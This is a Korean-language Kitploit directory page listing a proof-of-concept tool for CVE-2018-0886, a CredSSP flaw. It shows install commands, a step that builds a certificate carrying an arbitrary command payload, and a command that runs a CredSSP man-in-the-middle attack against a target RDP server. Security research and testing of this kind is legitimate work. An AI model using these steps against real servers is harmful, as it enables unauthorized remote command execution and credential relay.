Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
credssp — CVE-2018-0886을 시연하는 코드 | Kitploit
도구/GitHubGitHub/preempt/credssp
Vulnerability AnalysisExploitationLateral MovementPenetration TestingLearning & EducationRed Teaming
GitHubpreempt/credssp

credssp

CVE-2018-0886을 시연하는 코드

저장소 보기
267576년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

credssp

이것은 CVE-2018-0886을 악용하기 위한 PoC 코드입니다. 교육 목적으로만 사용해야 합니다. 이 코드는 rdpy 프로젝트(https://github.com/preempt/rdpy)의 포크에 의존하며, credssp 릴레이도 지원합니다.

Eyal Karni, Preempt 작성 [email protected]

빌드

지침 (Linux)

Ubuntu 14를 사용하는 경우 install 파일을 확인하세요.. Ubuntu 16.04에서 테스트되었습니다.

root@kitploit:~
$ git clone https://github.com/preempt/rdpy.git rdpy
$ git clone https://github.com/preempt/credssp.git 
$ cd credssp/install
$ sh install.sh
$ cd ../../rdpy
$ sudo python setup.py install
  • 상당히 깨끗한 초기 상태를 가정합니다. 먼저 관련 구성 요소(예: cryptography, pyopenssl)를 제거하는 것이 가장 좋습니다(pip uninstall cryptography).
  • 이 작업이 성공적으로 실행되려면 다른 버전의 openssl을 설치해야 합니다. 설치 스크립트가 이를 수행합니다.
  • 설명된 순서대로 지침을 따르십시오.

익스플로잇 실행

모든 도메인에서 서버 인증(Server Authentication)에 적합한 인증서를 내보내세요. (RDP에 사용됩니다. https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn781533(v=ws.11))

취약점을 악용하는(페이로드를 포함하는) 인증서를 생성하려면 다음을 사용하세요:

root@kitploit:~
$ python credssp/bin/gen_cmd.py -c ExportedCert -o exploitc.pem -k exploitk.pem CMD 

(ExportedCert는 1단계에서 내보낸 인증서입니다. exploitc.pem, exploitk.pem은 각각 생성된 인증서와 개인 키입니다.)

공격 스크립트를 실행하려면:

root@kitploit:~
$ python /usr/local/bin/rdpy-rdpcredsspmitm.py -k exploitk.pem -c exploitc.pem TargetServer

자세한 내용은 스크립트의 사용법 섹션(--help)에 있습니다.

도구 다운로드